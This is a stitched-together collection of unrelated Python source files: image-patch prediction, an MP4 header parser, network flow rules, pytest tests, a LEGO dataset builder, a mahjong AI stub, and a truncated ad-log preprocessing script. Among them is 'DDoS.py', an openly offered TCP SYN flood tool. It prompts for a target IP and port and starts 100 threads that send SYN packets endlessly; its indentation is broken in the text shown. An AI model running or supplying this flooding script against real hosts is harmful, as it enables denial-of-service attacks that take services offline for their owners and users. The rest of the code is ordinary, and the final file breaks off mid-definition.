                "location under folder 'output'. Overwriting may happen!"
            )
            save_dir = pathlib.Path(os.getcwd()).joinpath("output")
        save_dir = pathlib.Path(save_dir)
    if save_dir is not None:
        save_dir = pathlib.Path(save_dir)
        # exist_ok=False: deliberately fail rather than clobber a previous run
        save_dir.mkdir(parents=True, exist_ok=False)

    # return coordinates of patches processed within a tile / whole-slide image
    return_coordinates = True
    if not isinstance(imgs, list):
        raise ValueError(
            "Input to `tile` and `wsi` mode must be a list of file paths."
        )

    # None if no output
    outputs = None
    self._ioconfig = ioconfig
    # generate a list of output file paths if number of input images > 1
    file_dict = OrderedDict()
    for idx, img_path in enumerate(imgs):
        img_path = pathlib.Path(img_path)
        img_label = None if labels is None else labels[idx]
        img_mask = None if masks is None else masks[idx]

        dataset = WSIPatchDataset(
            img_path,
            mode=mode,
            mask_path=img_mask,
            patch_input_shape=ioconfig.patch_input_shape,
            stride_shape=ioconfig.stride_shape,
            resolution=ioconfig.input_resolutions[0]["resolution"],
            units=ioconfig.input_resolutions[0]["units"],
        )
        output_model = self._predict_engine(
            dataset,
            return_labels=False,
            return_probabilities=return_probabilities,
            return_coordinates=return_coordinates,
            on_gpu=on_gpu,
        )
        output_model["label"] = img_label
        # add extra information useful for downstream analysis
        output_model["pretrained_model"] = self.pretrained_model
        output_model["resolution"] = highest_input_resolution["resolution"]
        output_model["units"] = highest_input_resolution["units"]

        # Only the most recent image's outputs are kept in memory; with
        # multiple inputs results are persisted to disk instead.
        outputs = [output_model]
        merged_prediction = None
        if merge_predictions:
            merged_prediction = self.merge_predictions(
                img_path,
                output_model,
                resolution=output_model["resolution"],
                units=output_model["units"],
                postproc_func=self.model.postproc,
            )
            outputs.append(merged_prediction)

        if len(imgs) > 1 or save_output:
            # dynamic 0 padding
            img_code = f"{idx:0{len(str(len(imgs)))}d}"
            save_info = {}
            save_path = os.path.join(str(save_dir), img_code)
            raw_save_path = f"{save_path}.raw.json"
            save_info["raw"] = raw_save_path
            save_as_json(output_model, raw_save_path)
            if merge_predictions:
                merged_file_path = f"{save_path}.merged.npy"
                np.save(merged_file_path, merged_prediction)
                save_info["merged"] = merged_file_path
            file_dict[str(img_path)] = save_info

    return file_dict if len(imgs) > 1 or save_output else outputs
|
from mp4box.box import MediaHeaderBox
def parse_mdhd(reader, my_size):
    """Parse an ISO BMFF 'mdhd' (media header) box from *reader*.

    The first 32-bit word read contains the version byte (together with
    the flags); when it is zero the timestamps and duration are 32-bit,
    otherwise they are 64-bit. Returns a populated MediaHeaderBox.
    """
    version = reader.read32()
    box = MediaHeaderBox(my_size, version, 0)

    # Timestamp/duration width depends on the box version.
    read_time = reader.read32 if version == 0 else reader.read64
    box.creation_time = read_time()
    box.modification_time = read_time()
    box.timescale = reader.read32()
    box.duration = read_time()

    packed = reader.readn_as_int(2)
    box.pad = (packed >> 15) & 1
    lang_bits = packed & 0x7FFF
    # Three 5-bit fields, each a lowercase ISO-639 letter offset from 0x60.
    box.language = "".join(
        chr(0x60 + ((lang_bits >> shift) & 0x1F)) for shift in (10, 5, 0)
    )
    box.predefined = reader.read16()
    return box
|
import os
# Report the effective user id and greet only when running as root.
euid = os.geteuid()
print(euid)
if euid == 0:
    print("Hello root user! How are you?")
else:
    print("You must be root user!")
|
class Solution:
    def XXX(self, m: int, n: int) -> int:
        """Count the distinct monotone lattice paths through an m x n grid.

        Classic "unique paths" DP: each cell's count is the sum of the
        counts from the cell above and the cell to the left, computed
        with a single rolling row of size n.
        """
        counts = [0] * n
        for row in range(m):
            if row == 0:
                # First row: exactly one path to every cell.
                counts = [1] * n
            else:
                # counts[col] still holds the value from the row above;
                # counts[col - 1] is already updated for this row.
                for col in range(1, n):
                    counts[col] += counts[col - 1]
        return counts[-1]
|
from pyDatalog import pyDatalog
import action
import match
from reg import *
from logicalview import *
from flow_common import TABLE_LSP_EGRESS_FIRST, TABLE_LRP_INGRESS_IP_ROUTE, \
TABLE_EMBED2_METADATA, TABLE_DROP_PACKET, TABLE_OUTPUT_PKT
# Declare the pyDatalog variables and predicates used below. Terms such as
# State, State1, State2, LR, UUID_LR, PHY_CHASSIS, PCH_UUID, PCH_OFPORT,
# OFPORT, State_ADD and State_DEL are presumably provided by the wildcard
# imports from `reg` / `logicalview` above -- confirm there.
pyDatalog.create_terms('Table, Priority, Match, Action')
pyDatalog.create_terms('Action1, Action2, Action3, Action4, Action5')
pyDatalog.create_terms('Match1, Match2, Match3, Match4, Match5')
pyDatalog.create_terms('embed_metadata, extract_metadata, pipeline_forward')
pyDatalog.create_terms('redirect_other_chassis')
pyDatalog.create_terms('_gateway_state_sum, gateway_ofport')
pyDatalog.create_terms('_gateway_ofport, _gateway_ofport_readd')
pyDatalog.create_terms('A, B, C, X, Y, Z, UUID_CHASSIS')

# it does not count deleting-element in, because it was only consumed by
# adding(_gateway_ofport) below
# Aggregate: total combined state over every remote chassis that hosts a
# logical router (one contribution per physical-chassis UUID).
(_gateway_state_sum[X] == sum_(State, for_each=Z)) <= (
    remote_chassis(UUID_CHASSIS, PHY_CHASSIS, State1) &
    lr_array(LR, UUID_LR, State2) &
    (LR[LR_CHASSIS_UUID] == UUID_CHASSIS) &
    (State == State1 + State2) & (State >= 0) &
    (X == None) &
    (Z == PHY_CHASSIS[PCH_UUID])
)

# Gateway ofports being added: tuple of ofports (ordered by chassis UUID)
# for all non-deleted gateway chassis, tagged with the aggregate state.
(_gateway_ofport[X] == tuple_(Y, order_by=Z)) <= (
    remote_chassis(UUID_CHASSIS, PHY_CHASSIS, State1) &
    lr_array(LR, UUID_LR, State2) &
    (LR[LR_CHASSIS_UUID] == UUID_CHASSIS) &
    (State == State1 + State2) & (State >= 0) &
    (_gateway_state_sum[A] == B) &
    (X == ('adding', B)) &
    (Y == PHY_CHASSIS[PCH_OFPORT]) &
    (Z == PHY_CHASSIS[PCH_UUID])
)

# Gateway ofports being deleted (negative combined state).
(_gateway_ofport[X] == tuple_(Y, order_by=Z)) <= (
    (X == ('deleting', State_DEL)) &
    remote_chassis(UUID_CHASSIS, PHY_CHASSIS, State1) &
    lr_array(LR, UUID_LR, State2) &
    (LR[LR_CHASSIS_UUID] == UUID_CHASSIS) &
    (State == State1 + State2) & (State < 0) &
    (Y == PHY_CHASSIS[PCH_OFPORT]) &
    (Z == PHY_CHASSIS[PCH_UUID])
)

# Gateway ofports to re-add: surviving (state >= 0) chassis computed only
# when some deletion occurred in the same round.
(_gateway_ofport_readd[X] == tuple_(Y, order_by=Z)) <= (
    (X == ('readding', State_ADD)) &
    (_gateway_ofport[A] == B) & (A[0] == 'deleting') &
    remote_chassis(UUID_CHASSIS, PHY_CHASSIS, State1) &
    lr_array(LR, UUID_LR, State2) &
    (LR[LR_CHASSIS_UUID] == UUID_CHASSIS) &
    (State == State1 + State2) & (State >= 0) &
    (Y == PHY_CHASSIS[PCH_OFPORT]) &
    (Z == PHY_CHASSIS[PCH_UUID])
)

# gateway_ofport is the union of the add and re-add views above.
(gateway_ofport[X] == Y) <= (_gateway_ofport[X] == Y)
(gateway_ofport[X] == Y) <= (_gateway_ofport_readd[X] == Y)

# it may output same flows, because we have adding and readding
# Set the redirect flag, pick an ofport via bundle_load, then embed the
# metadata and emit the packet.
redirect_other_chassis(Priority, Match, Action, State) <= (
    (Priority == 1) &
    (gateway_ofport[X] == OFPORT) &
    (State == X[1]) & (State != 0) &
    match.match_none(Match) &
    action.load(1, NXM_Reg(REG_FLAG_IDX, FLAG_REDIRECT_BIT_IDX,
                           FLAG_REDIRECT_BIT_IDX), Action1) &
    action.bundle_load(NXM_Reg(REG_OUTPORT_IDX), OFPORT, Action2) &
    action.resubmit_table(TABLE_EMBED2_METADATA, Action3) &
    action.resubmit_table(TABLE_OUTPUT_PKT, Action4) &
    (Action == Action1 + Action2 + Action3 + Action4)
)

# Fallback: drop the packet.
# NOTE(review): this rule uses 3 arguments while the rule above uses 4;
# in pyDatalog these are distinct predicates -- confirm this is intended.
redirect_other_chassis(Priority, Match, Action) <= (
    (Priority == 0) &
    match.match_none(Match) &
    action.resubmit_table(TABLE_DROP_PACKET, Action)
)

# Copy pipeline registers (datapath id, src/dst ports, flags) into the
# tunnel id / tunnel metadata fields before sending across the tunnel.
embed_metadata(Priority, Match, Action) <= (
    (Priority == 0) &
    match.match_none(Match) &
    action.move(NXM_Reg(REG_DP_IDX, 0, 23),
                NXM_Reg(TUN_ID_IDX, 0, 23), Action1) &
    action.move(NXM_Reg(REG_SRC_IDX, 0, 15),
                NXM_Reg(TUN_METADATA0_IDX, 0, 15), Action2) &
    action.move(NXM_Reg(REG_DST_IDX, 0, 15),
                NXM_Reg(TUN_METADATA0_IDX, 16, 31), Action3) &
    action.move(NXM_Reg(REG_FLAG_IDX, 0, 31),
                NXM_Reg(TUN_METADATA0_IDX, 32, 63), Action4) &
    (Action == Action1 + Action2 + Action3 + Action4)
)

# Inverse of embed_metadata: restore pipeline registers from the tunnel
# id / tunnel metadata on the receiving side.
extract_metadata(Priority, Match, Action) <= (
    (Priority == 0) &
    match.match_none(Match) &
    action.move(NXM_Reg(TUN_ID_IDX, 0, 23),
                NXM_Reg(REG_DP_IDX, 0, 23), Action1) &
    action.move(NXM_Reg(TUN_METADATA0_IDX, 0, 15),
                NXM_Reg(REG_SRC_IDX, 0, 15), Action2) &
    action.move(NXM_Reg(TUN_METADATA0_IDX, 16, 31),
                NXM_Reg(REG_DST_IDX, 0, 15), Action3) &
    action.move(NXM_Reg(TUN_METADATA0_IDX, 32, 63),
                NXM_Reg(REG_FLAG_IDX, 0, 31), Action4) &
    (Action == Action1 + Action2 + Action3 + Action4)
)

pipeline_forward(Priority, Match, Action) <= (
    (Priority == 1) &
    match.ip_proto(Match1) &
    # a ip packet with 00 macaddress means it was a redirect packet which
    # send out by other host, deliver this packet to LR to help redirect
    match.eth_dst("00:00:00:00:00:00", Match2) &
    match.reg_flag(FLAG_REDIRECT, Match3) &
    (Match == Match1 + Match2 + Match3) &
    # TABLE_LRP_INGRESS_FIRST table is a tracing-point
    # as well and dec_ttl, skip that table
    action.resubmit_table(TABLE_LRP_INGRESS_IP_ROUTE, Action)
)

# it is a regular packet, forward to lsp egress table immediately
pipeline_forward(Priority, Match, Action) <= (
    (Priority == 0) &
    match.match_none(Match) &
    action.resubmit_table(TABLE_LSP_EGRESS_FIRST, Action)
)
|
import itertools
import pytest
from streamlit_prophet.lib.dataprep.clean import _log_transform, _remove_rows, clean_future_df
from tests.samples.df import df_test
from tests.samples.dict import make_cleaning_test
@pytest.mark.parametrize(
    "df, cleaning",
    list(
        itertools.product(
            [df_test[8], df_test[11], df_test[12]],
            [
                make_cleaning_test(),
                make_cleaning_test(del_days=[6]),
                make_cleaning_test(del_days=[0, 1, 2, 3, 4, 5]),
                make_cleaning_test(del_zeros=False),
                make_cleaning_test(del_negative=False),
            ],
        )
    ),
)
def test_remove_rows(df, cleaning):
    """_remove_rows drops only the configured days / zero / negative rows."""
    output = _remove_rows(df.copy(), cleaning)
    # Only rows may be removed, never columns.
    assert output.shape[1] == df.shape[1]
    # Each configured day of the week disappears entirely from the output.
    n_days_removed = len(cleaning["del_days"])
    assert output.ds.dt.dayofweek.nunique() + n_days_removed == df.ds.dt.dayofweek.nunique()
    if cleaning["del_negative"]:
        # No negative target values may survive the cleaning.
        assert output.y.min() >= 0
    if cleaning["del_zeros"]:
        # No zero target values may survive the cleaning.
        assert abs(output.y).min() > 0
@pytest.mark.parametrize(
    "df, cleaning, expected_min, expected_max",
    [
        (df_test[15], make_cleaning_test(log_transform=True), 0.69, 0.7),
        (df_test[16], make_cleaning_test(log_transform=True), 1.09, 1.1),
        (df_test[12].loc[df_test[12]["y"] > 0.1], make_cleaning_test(log_transform=True), -10, 10),
    ],
)
def test_log_transform(df, cleaning, expected_min, expected_max):
    """_log_transform rescales y into a known range without reshaping."""
    output = _log_transform(df.copy(), cleaning)
    # The mean of the transformed y must fall inside the expected interval.
    assert expected_min < output.y.mean() < expected_max
    # The transform is element-wise, so the frame shape is preserved...
    assert output.shape == df.shape
    # ...and the number of distinct y values is preserved too.
    assert output.y.nunique() == df.y.nunique()
@pytest.mark.parametrize(
    "df, cleaning",
    list(
        itertools.product(
            [df_test[8], df_test[11], df_test[12]],
            [
                make_cleaning_test(),
                make_cleaning_test(del_days=[6]),
                make_cleaning_test(del_days=[0, 1, 2, 3, 4, 5]),
            ],
        )
    ),
)
def test_clean_future_df(df, cleaning):
    """clean_future_df removes the configured days from a future dataframe."""
    output = clean_future_df(df.copy(), cleaning)
    # Cleaning only drops rows; the column count is untouched.
    assert output.shape[1] == df.shape[1]
    # Each configured day of the week disappears entirely from the output.
    n_days_removed = len(cleaning["del_days"])
    assert output.ds.dt.dayofweek.nunique() + n_days_removed == df.ds.dt.dayofweek.nunique()
|
#DDoS.py
#Imports:
import os
import sys
import socket
from platform import platform
from os import listdir
os.system('pip3 install scapy')
from scapy.all import *
import threading
version = 'v Alpha 0.3'
def get_ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
# Change version in var
title = '''
A DDoS/ DoS script written in Python, the upgraded version of the Batch version.
srforek
__ _ ___ ___ __ _ ___ __ __ __ __
| \| |_ | __| \| (_ | __ | _\| _\ /__\ /' _/
| | ' |/ /| _|| | ' |/ / |__| | v | v | \/ |`._`.
|_|\__|___|___|_|\__|___| |__/|__/ \__/ |___/
'''+version+'''
:DDoS/ DoS python script:
By editor99
Github repo: https://github.com/Gteditor99/DDOS-Nzen2
Youtube: https://www.youtube.com/channel/UCrxNyJTsVtg5pSq3AYbhiAw
Discord: editor99#6207
'''
logoascii = '''
__ _ ___ ___ __ _ ___ __ __ __ __
| \| |_ | __| \| (_ | __ | _\| _\ /__\ /' _/
| | ' |/ /| _|| | ' |/ / |__| | v | v | \/ |`._`.
|_|\__|___|___|_|\__|___| |__/|__/ \__/ |___/
'''
# Functioan for Main Screen, (mainscr) for easy access.
def mainscr():
os.system("cls")
print(title)
os.system("pause")
mainscr()
os.system("cls")
sc2 = '''
Enter the destination IP Address:
then,
Enter the port:
ex: xxx.xxx.x.x (Enter)
xx (Enter)
(Localhost is the Local IP)
(Port 80 is the most common ICP, HTTP. )
'''
# Function for Second Screen, (secondscr) for easy access.
def secondscr():
os.system('cls')
print(sc2)
print(logoascii)
print(secondscr())
target_ip = input("IP:")
target_port = input("Port:")
destip = target_ip
destport = target_port
packets_sent = 0
def attack():
while True:
p = IP(dst= target_ip) / TCP(flags="S", sport=RandShort(), dport=int(target_port))
send(p , verbose=1, loop=0)
global packets_sent
packets_sent += 1
print(infoui)
infoui = '''
Nzen2-DDoSpy Info screen:
Attack type: TCP flood
Sender IP:
Destination IP: '''+str(destip)+'''
Destination Port: '''+str(destport)+'''
Packets sent: '''+str(packets_sent)+'''
'''
for i in range(0,100):
Thread = threading.Thread(target=attack())
Thread.start()
input("Press Enter to exit:")
# Yo buddy, still alive?
|
#!/usr/bin/env python
import os
import random
import json
import tqdm
import ltron.settings as settings
from ltron.bricks.brick_scene import BrickScene
# Map from an OMR set file (or bare set number) to the subdocuments that
# should be broken out as standalone models. Commented-out entries were
# inspected and rejected (duplicates or models too large for 256x256).
breakout = {
    '4096 - Micro Wheels - AB Truck and Trailer.mpd' : [
        '4096 - ab truck.ldr'
    ],
    '8123' : ['8123 - 1.ldr'],
        #'8123 - 2.ldr'], # duplicate of - 1 except for button helmet color
    '8124' : ['8124 - 1.ldr',
              '8124 - 2.ldr'],
    '8125' : ['8125 - 8125-1.ldr',
              '8125 - 8125-2.ldr'],
    '8126' : ['8126 - 8126-1.ldr',
              '8126 - 8126-2.ldr'],
    '8134' : ['8134 - 8134-1.ldr',
              '8134 - 8134-2.ldr',
              #'8134 - 8134-3.ldr', # 164 parts, second largest
              '8134 - 8134-3-a.ldr', # just the cab please
              '8134 - 8134-3-b.ldr', # and actualy the flatbed too
             ],
    '8135' : ['8135 - 8135-1.ldr',
              '8135 - 8135-2.ldr',
              '8135 - 8135-3.ldr',
              '8135 - 8135-4.ldr'],
    '8147' : ['8147 - 8147-1.ldr',
              '8147 - 8147-2.ldr',
              '8147 - 8147-3.ldr', # 104 parts, seems manageable
              #'8147 - 8147-4.ldr', # 101 parts, but longer than 8147-3
              '8147 - 8147-4-a.ldr', # cab
              '8147 - 8147-4-c.ldr', # trailer
              '8147 - 8147-5.ldr',
              '8147 - 8147-6.ldr',
              #'8147 - 8147-7.ldr'], # 121 parts, quite large
              '8147 - 8147-7-a.ldr', # but hey! we can separate it out!
              #'8147 - 8147-7-b.ldr', # just a connector
              #'8147 - 8147-7-c.ldr', # no wheels, long and has strange pieces
              '8147 - 8147-7-d.ldr', # end of the trailer
             ],
    '8152' : ['8152 - 8152-1.ldr',
              '8152 - 8152-2.ldr',
              '8152 - 8152-3.ldr',
              '8152 - 8152-4.ldr',
              '8152 - 8152-5.ldr'],
    '8154' : ['8154 - 8154-1.ldr',
              '8154 - 8154-2.ldr',
              '8154 - 8154-3.ldr',
              '8154 - 8154-4.ldr',
              '8154 - 8154-5.ldr',
              '8154 - 8154-6.ldr',
              #'8154 - 8154-7.ldr', # 202 parts, largest (way too big for 256x256)
              '8154 - 8154-7-a.ldr', # cab
              #'8154 - 8154-7-b.ldr' # trailer, long weird parts, quite large
              '8154 - 8154-8.ldr'],
    '8182' : ['8182 - 8182-1.ldr',
              '8182 - 8182-2.ldr',
              '8182 - 8182-3.ldr',
              '8182 - 8182-4.ldr',
              '8182 - 8182-5.ldr'],
    '8186' : ['8186 - 8186-1.ldr',
              '8186 - 8186-2.ldr',
              '8186 - 8186-3.ldr',
              '8186 - 8186-4.ldr',
              '8186 - 8186-5.ldr',
              '8186 - 8186-6.ldr',
              '8186 - 8186-7.ldr'],
    '8196' : ['8196 - 8196-1.ldr',
              '8196 - 8196-2.ldr'],
    '8197' : ['8197 - 8197-1.ldr',
              '8197 - 8197-2.ldr'],
    '8198' : ['8198 - 8198-1.ldr',
              '8198 - 8198-2.ldr'],
    '8199' : ['8199 - 8199-1.ldr',
              '8199 - 8199-2.ldr'],
    '8211' : ['8211 - 8211-1.ldr',
              '8211 - 8211-2.ldr',
              '8211 - 8211-3.ldr',
              '8211 - 8211-4.ldr',
              '8211 - 8211-5.ldr'],
    '8681' : ['8681 - 8681-1.ldr',
              '8681 - 8681-2.ldr',
              '8681 - 8681-3.ldr',
              '8681 - 8681-4.ldr',
              '8681 - 8681-5.ldr'],
}

# this is a list of tiny turbos sets according to bricklink
# check and see which ones exist in the OMR
# commented out entries have multiple models inside them
# these should probably be manually inspected to see if they have usable
# subdocuments once we have a way to include subdocuments in a dataset
set_numbers = [
    '4096',
    '4947',
    '4948',
    '4949',
    '6111',
    '7452',
    '7453',
    '7611',
    '7612',
    '7613',
    '7800',
    '7801',
    '7802',
    '8119',
    '8120',
    '8121',
    '8122',
    '8123', # multiple models
    '8124', # multiple models
    '8125', # multiple models
    '8126', # multiple models
    '8130',
    '8131',
    '8132',
    '8133',
    '8134', # multiple models
    '8135', # multiple models
    '8147', # multiple models
    '8148',
    '8149',
    '8150',
    '8151',
    '8152', # multiple models
    '8153',
    '8154', # multiple models
    #'8155', # multiple models but doesn't exist in OMR
    '8182', # multiple models
    '8186', # multiple models
    '8192',
    '8193',
    '8194',
    '8195',
    '8196', # multiple models
    '8197', # multiple models
    '8198', # multiple models
    '8199', # multiple models
    '8211', # multiple models
    '8301',
    '8302',
    '8303',
    '8304',
    '8595',
    '8641',
    '8642',
    '8643',
    '8644',
    '8655',
    '8656',
    '8657',
    '8658',
    '8661',
    '8662',
    '8663',
    '8664',
    '8665',
    '8666',
    '8681', # multiple models
    '30030',
    '30033',
    '30034',
    '30035',
    '30036']

# Scan the OMR ldraw directory and record, per set number, every file that
# matches either "<number> ..." (base set) or "<number>-<subset>..." names.
existing_sets = {}
tiny_turbos3_path = settings.datasets['tiny_turbos3']
omr_ldraw = os.path.join(os.path.dirname(tiny_turbos3_path), 'ldraw')
all_sets = sorted(os.listdir(omr_ldraw))
for set_number in set_numbers:
    for subset_number in range(1,10):
        for set_name in all_sets:
            if subset_number == 1 and set_name.startswith(set_number + ' '):
                if set_number not in existing_sets:
                    existing_sets[set_number] = []
                existing_sets[set_number].append(set_name)
            elif set_name.startswith(set_number + '-' + str(subset_number)):
                if set_number not in existing_sets:
                    existing_sets[set_number] = []
                existing_sets[set_number].append(set_name)

# manual hack to fix "Black Racer.mpd" which has no set number in the file name
#breakout_paths.append(os.path.join(omr_ldraw, 'Black Racer.mpd'))
existing_sets['Black Racer'] = ['Black Racer.mpd']

print('%i sets found'%len(sum(existing_sets.values(), [])))

# Accumulators filled in by the scan loop below.
breakout_paths = []
scene = BrickScene()
scene.make_track_snaps()
instance_counts = {}
instances_per_scene = []
edges_per_scene = []
all_colors = set()
set_signatures = {}
# Import every (broken-out) model once, counting instances, edges, colors
# and per-shape usage, and dropping files whose part signature duplicates
# one already seen.
for set_number, set_list in existing_sets.items():
    for existing_set in set_list:
        # Prefer a breakout entry keyed by the bare set number; fall back
        # to one keyed by the full file name; otherwise use the whole file.
        if set_number in breakout:
            file_paths = ['%s:%s'%(existing_set, subdocument)
                for subdocument in breakout[set_number]]
        elif existing_set in breakout:
            file_paths = ['%s:%s'%(existing_set, subdocument)
                for subdocument in breakout[existing_set]]
        else:
            file_paths = [existing_set]
        for file_path in file_paths:
            scene.clear_instances()
            scene.clear_assets()
            scene.import_ldraw(os.path.join(omr_ldraw, file_path))
            instances_per_scene.append(len(scene.instances))
            set_signature = {}
            for instance_id, instance in scene.instances.items():
                # BUG FIX: the signature dict previously tested membership
                # with str(brick_shape) but stored under the brick_shape
                # object itself, so counts were reset on every instance and
                # the duplicate-set detection below was unreliable. Key
                # consistently by the shape name (as instance_counts does).
                shape_name = str(instance.brick_shape)
                if shape_name not in instance_counts:
                    instance_counts[shape_name] = 0
                instance_counts[shape_name] += 1
                all_colors.add(instance.color)
                if shape_name not in set_signature:
                    set_signature[shape_name] = 0
                set_signature[shape_name] += 1
            set_signature = ','.join('%s:%i'%(key, value)
                for key, value in set_signature.items())
            # Only the first file with a given part signature is kept.
            if set_signature not in set_signatures:
                breakout_paths.append(file_path)
                set_signatures[set_signature] = []
            set_signatures[set_signature].append(file_path)
            edges = scene.get_all_edges(unidirectional=True)
            edges_per_scene.append(edges.shape[1])
            print('%s:'%file_path)
            print(' %i instances'%len(scene.instances))
            print(' %i edges'%(edges.shape[1]))
# Summary statistics for the deduplicated dataset.
print('%i broken-out sets found'%len(breakout_paths))
print('%i unique sets found'%len(set_signatures))
for set_signature, file_paths in set_signatures.items():
    if len(file_paths) > 1:
        print('Warning possible duplicated sets:')
        for file_path in file_paths:
            print(' ', file_path)

print('Average instances per model: %f'%(
    sum(instances_per_scene)/len(instances_per_scene)))
print('Min/Max instances per model: %i, %i'%(
    min(instances_per_scene), max(instances_per_scene)))
print('Average edges per model: %f'%(
    sum(edges_per_scene)/len(edges_per_scene)))
print('Min/Max edges per model: %i, %i'%(
    min(edges_per_scene), max(edges_per_scene)))

# Part usage, most common shape first.
sorted_instance_counts = reversed(sorted(
    (value, key) for key, value in instance_counts.items()))
print('Part usage statistics:')
for count, brick_shape in sorted_instance_counts:
    print('%s: %i'%(brick_shape, count))
print('%i total brick shapes'%len(instance_counts))

# Deterministic train/test split: fixed seed, 20 held-out test models.
random.seed(1234)
breakout_paths = list(sorted(breakout_paths))
test_set = sorted(random.sample(breakout_paths, 20))
train_set = [path for path in breakout_paths if path not in test_set]
all_tiny_turbos = ['ldraw/' + set_name for set_name in breakout_paths]
train_tiny_turbos = ['ldraw/' + set_name for set_name in train_set]
test_tiny_turbos = ['ldraw/' + set_name for set_name in test_set]

# Dataset metadata: splits, scene-size bounds, shape-name -> id mapping
# (ids start at 1) and the sorted list of colors seen.
dataset_info = {
    'splits' : {
        'all' : all_tiny_turbos,
        'train' : train_tiny_turbos,
        'test' : test_tiny_turbos
    },
    'max_instances_per_scene' : max(instances_per_scene),
    'max_edges_per_scene' : max(edges_per_scene),
    'shape_ids':dict(
        zip(sorted(instance_counts.keys()),
            range(1, len(instance_counts)+1))),
    'all_colors':list(sorted(all_colors, key=int))
}
with open(tiny_turbos3_path, 'w') as f:
    json.dump(dataset_info, f, indent=4)
|
from os import listdir
from os import path
from flyingpigeon import sdm
# Directory of daily 'tas' CORDEX NetCDF files fetched through malleefowl.
p = '/home/nils/birdhouse/var/lib/pywps/cache/malleefowl/esgf1.dkrz.de/thredds/fileServer/cordex/cordex/output/AFR-44/MPI-CSC/MPI-M-MPI-ESM-LR/historical/r1i1p1/MPI-CSC-REMO2009/v1/day/tas/v20160412/'
ncs = [path.join(p, nc) for nc in listdir(p)]
ncs.sort()
# Available SDM index names (kept for reference); TG_AMJJAS is computed below.
indices = sdm._SDMINDICES_
in_nc = sdm.get_indices(ncs, indices=['TG_AMJJAS'])
# BUG FIX: the original printed the undefined name `fp_indice` (NameError);
# the computed result is stored in `in_nc`.
print(in_nc)
|
import numpy as np
# Example AI interface.
# Called whenever the engine needs a decision about a call (chi/pon/kan),
# declaring riichi, or winning (ron/tsumo).
def action(info, action_type):
    """Respond to an engine prompt identified by `action_type`.

    Returns False to decline a call, True to confirm a win, and None to
    take no action at all.
    """
    if action_type in ('pon', 'chii', 'kan'):
        return False  # decline the call
    if action_type in ('ron', 'tsumo'):
        return True  # confirm the win
    return None  # do nothing
# Called when the AI must discard a tile.
def discard(info):
    """Always discard the last tile in hand (index of the final element)."""
    last_index = len(info.hand) - 1
    return last_index
|
# Given numbers (hour, minute, second) specifying a moment of time,
# determine the angle swept by the hour hand between the start of the day
# and that moment: 30 deg per hour, 0.5 deg per minute, 0.5/60 deg per second.
(lambda hour, minute, second:
 print(abs(hour * 30 + minute * 0.5 + second * 0.5/60))) \
(float(input()), float(input()), float(input()))
|
# -*- coding: utf-8 -*-
"""
@file:maketrain.py
@time:2019/5/6 16:42
@author:Tangj
@software:Pycharm
@Desc
"""
import pandas as pd
import numpy as np
import gc
import time
# Shard filenames of the raw request-log CSVs to process below,
# presumably named by the ad-id range each shard covers -- verify.
name = ['log_0_1999', 'log_2000_3999', 'log_4000_5999','log_6000_7999', 'log_8000_9999', 'log_10000_19999',
        'log_20000_29999', 'log_30000_39999','log_40000_49999',
        'log_50000_59999','log_60000_69999','log_70000_79999','log_80000_89999','log_90000_99999',
        'log_100000_109999','log_110000_119999','log_120000_129999','log_130000_139999']
def group_split(list_values):
    """Union several comma-separated value strings into one sorted string.

    Each element of `list_values` is split on ',', duplicates are removed,
    and the unique tokens are string-sorted.  If the wildcard 'all' appears
    anywhere, 'all' is returned; otherwise the tokens are re-joined with ','.
    """
    merged = []
    for raw in list_values:
        for token in raw.split(','):
            if token not in merged:
                merged.append(token)
    merged.sort()
    if 'all' in merged:
        return 'all'
    return ','.join(merged)
def putting_time_process(put_time):
    """OR together 48-bit putting-time masks and summarise them.

    Each element of `put_time` is a (string) integer whose bits mark active
    half-hour slots.  Returns a tuple of:
      * the combined mask as an int,
      * the combined mask as a 48-character '0'/'1' string (MSB first),
      * the number of active slots.
    """
    slot_counts = [0] * 48
    for raw in put_time:
        # bin(...)[2:] reversed walks the bits LSB-first, matching the
        # original per-character accumulation.
        for slot, bit_char in enumerate(reversed(bin(int(raw))[2:])):
            slot_counts[slot] += int(bit_char)
    mask_bits = ''.join('1' if c >= 1 else '0' for c in reversed(slot_counts))
    active_total = sum(1 for c in slot_counts if c >= 1)
    return int(mask_bits, 2), mask_bits, active_total
def disstatus(train, option):
    """Remove log rows recorded while the ad was switched off.

    changeField == 1 operations toggle the ad on/off: a changeValue of '0'
    opens a disabled interval and the next '1' closes it.  Rows of `train`
    whose 'statime' falls inside a disabled interval are dropped.  If the
    final interval is still open (odd number of toggles), everything from
    its start onwards is dropped.

    Arguments:
        train  : DataFrame of log rows (must contain 'statime').
        option : DataFrame of operation records for this ad.

    Returns the filtered `train`.
    """
    print("status processing")
    distime = []
    opstatus = option[option['changeField'] == 1]
    opstatus.index = opstatus['statime']
    # BUG FIX: sort_index() is not in-place; the original discarded the
    # sorted result, so on/off toggles could be paired out of order.
    opstatus = opstatus.sort_index()
    opstatus.index = range(opstatus.shape[0])
    values = opstatus['changeValue']
    optime = opstatus['statime'].values
    # Collect interval boundaries: '0' opens, the next '1' closes.
    flag = 1
    j = 0
    for i in values:
        if (i == '0') & (flag == 1):
            distime.append(optime[j])
            flag = 0
        if (i == '1') & (flag == 0):
            distime.append(optime[j])
            flag = 1
        j += 1
    if len(distime) == 0:
        return train
    if len(distime) % 2 != 0:
        # Open-ended disabled period: drop everything after its start.
        train = train[train['statime'] < distime[-1]]
    j = 0
    for _ in range(int(len(distime) / 2)):
        t1 = distime[j]
        t2 = distime[j + 1]
        j += 2
        train = pd.concat([train[train['statime'] < t1],
                           train[train['statime'] > t2]])
    gc.collect()
    return train
def initValue(train, operate):
    """Apply the ad's creation-time (optionType == 2) settings to all rows.

    Initialises the bid ('adBid'), the audience-targeting columns and the
    weekly putting-time schedule ('puttingTime') on `train`.

    Arguments:
        train   : DataFrame of log rows for one ad (must contain 'week').
        operate : DataFrame of operation records for that ad.

    Returns the modified `train`.
    """
    print("initing processing")
    ope = operate[operate['optionType'] == 2]
    # --- initial bid -----------------------------------------------------
    print("initing bid")
    inb = ope[ope['changeField'] == 2]['changeValue']
    if inb.shape[0] == 0:
        train.loc[:, 'adBid'] = 88  # fallback bid when no record exists
    else:
        inbid = '-1'
        for i in inb:
            inbid = i  # first recorded value wins
            break
        train.loc[:, 'adBid'] = int(inbid)
    # --- initial audience targeting: default everything to 'all' ---------
    print("initing peo")
    # Map the lower-cased field names found in changeValue to columns.
    column_map = {
